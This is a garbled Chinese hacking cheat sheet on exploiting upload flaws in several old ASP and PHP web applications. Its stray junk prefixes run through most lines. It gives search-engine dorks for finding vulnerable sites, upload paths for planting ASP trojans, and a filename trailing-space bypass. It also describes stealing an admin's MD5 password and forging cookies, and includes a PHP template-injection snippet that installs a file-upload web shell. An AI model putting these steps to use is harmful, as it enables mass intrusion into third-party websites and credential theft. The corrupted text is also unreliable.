一、E时代驿站漏洞
ft/k-64 百度搜索"E时代驿站"
CG%bZco(( 漏洞利用页面 /upload.asp 用老兵直接上传
mPA)G,^ 7FH-l(W 二、沸腾新闻系统上传漏洞
M
%,\2!$ 搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用
?eTZ>o.p/ 漏洞:没有对空格进行严格的限制。
}C @xl9S " 所以,我们直接选定要上传的asp木马,然后在后面加上空格
[7><^?t
V 它的上传文件是UploadFaceOK.asp
diXWm-ZKL ,It0brF 三、尘缘雅境
.M:&Aj)x16 ZW;Ec+n_K 在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看
)L&y@dy) 到出现了 一大堆 使用尘缘雅境系统的网站.比如说他的网站首页是
http://www.xx.com/asfq/index.asp,那么就要这样填写
http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目录]:/asfq/admin(注意一定要加上admin),[漏洞文件]一般不用改,不过有些老版的尘缘系统的漏洞文是uploadok.asp,如果uploadfaceok.asp不成功再改
w
yxPvI` |r+ x/,2- 四、OFSTAR论坛漏洞利用程序(群共享中)
fExFpR,` 搜索: powered by ofstar.net
&~eCDlX/ 1:输入管理员用户名
[lIX&!T" 2:输入任意一个帖子的路径!
d>Tv?'o`q 3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的!
\8#[AD*@s2 4:单击直接登陆按钮!程序会自动构造Cookies进行锹?单击管理栏的"超管"可直接进入后台!
IS8 sJ6") !y@\w 上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样)
<Ch9"1f3, l'l&Zqd 然后使用提交页面提交``可以直接拿到shell!
YAXd +\+j/sa <style type='text/css'>
NzZ(Nz5 </style>
CY?J$sN <!--
'Qt[cW EOT;
D<v<
: ?>-->
;^:8F <?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
k:n{AoUc
<!--
PZ/tkw <?php
H^Pq[3NQ print <<<EOT
JX'}+.\ -->
kVLZdXn,q2 N]yT/8 五、破废墟BLOG漏洞
\:h7,[e 百度搜:"破废墟 Bloging" ,在后面加上upfile.asp,结果返回
&</)k|.A6\ DLOG错误:提交的数据来自网站外部 | 返 回
=H7p&DhD